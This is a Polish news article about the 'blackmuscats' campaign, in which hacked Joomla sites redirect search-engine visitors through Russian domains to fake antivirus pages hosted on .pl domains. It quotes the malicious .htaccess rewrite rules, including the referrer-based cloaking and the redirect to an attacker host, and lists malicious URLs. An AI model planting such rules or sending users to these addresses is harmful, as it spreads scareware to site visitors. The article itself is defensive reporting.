Jak donosi firma Sucuri, kilka tysięcy serwerów pod kontrolą włamywaczy przekierowuje ruch na strony oferujące fałszywe oprogramowani antywirusowe, zarejestrowane w domenach z końcówką .pl.
Kampania nazwana „blackmuscats” (od ciągu występującego w przekierowywanych linkach) została po raz pierwszy opisana przez Sucuri wczoraj. Odkryto przynajmniej 17 tysięcy serwisów internetowych, które poprzez zmodyfikowany plik .htaccess przekierowują cały ruch przychodzący do stron serwujących fałszywe oprogramowanie antywirusowe. Sam atak wg istniejących doniesień prawdopodobnie wykorzystuje błędy w jednym z modułów Joomli (com_jce) i pozostawia na serwerze tylne furtki w php, umożliwiające przywrócenie zmian w razie naprawienia ich przez właściciela serwisu.
Okno wyświetlane przez fałszywego antywirusa
Przykładowy zmodyfikowany plik .htaccess:
RewriteCond %{HTTP_REFERER} ^.*(google|ask|yahoo|youtube|wikipedia|excite|..suchmaschine|web-archiv|infospace)\.(.*)
RewriteRule ^(.*)$ http://moisupas.ru/blackmuscats?5 [R=301,L]
Plik oznacza, że każdy użytkownik, wchodzący na stronę z wyszukiwarki (co zabezpiecza przed zbyt szybkim odkryciem przez właściciela lub regularnego gościa witryny), zostanie przekierowany na stronę atakujących. Strony te znajdują się w domenie .ru – poniżej lista najczęściej występujących adresów:
1251 przypadków http://fitnes-corp.ru/shurimuri?5 1093 przypadków http://infofitnes.ru/interactive?5 818 przypadków http://fitnes-company.ru/interactive?5 817 przypadków http://mir-fitnes.ru/interactive?5 802 przypadków http://info-fitnes.ru/interactive?5 788 przypadków http://fitnescompany.ru/interactive?5 268 przypadków http://fitnes-corp.ru/shurimuri?5 220 przypadków http://infofitnes.ru/interactive?5 188 przypadków http://cofitnes.ru/mimosa?5
Każdy z tych adresów przekierowuje z kolei na domenę docelową, gdzie znajduje się fałszywy antywirus. Co ciekawe, dzisiaj na liście stron hostujących fałszywego antywirusa pojawiło się kilka domen z końcówką .pl.
http://www1.vulnerabilitytoolssolver.pl/18o8e9/al/1fedfba29dd0193d/pr2/0/
http://www1.antivirusworrydanger.pl/370l3591/al/1fedfba29dd0193d/pr2/0/
http://minimizerprocessesdebugger.pl/b6l1s/al/78dee9e271084cb2/pr2/238/
http://www1.stabilityprotectionscanner.pl/n9044s5/al/1fedfba29dd0193d/pr2/0/
http://centercleanerdebug.pl/040k1f746x/al/68efd410a6a48b3c/pr2/2/
http://custodiandatainspection.pl/58rjfku4/al/78dee9e271084cb2/196/
http://wreckavverify.pl/51d7ie889/al/fdd91a64ce20e17d/pr2/
To dość interesująca tendencja – nie pamiętamy, kiedy ostatnio polskie adresy były w ten sposób wykorzystywane przez atakujących.
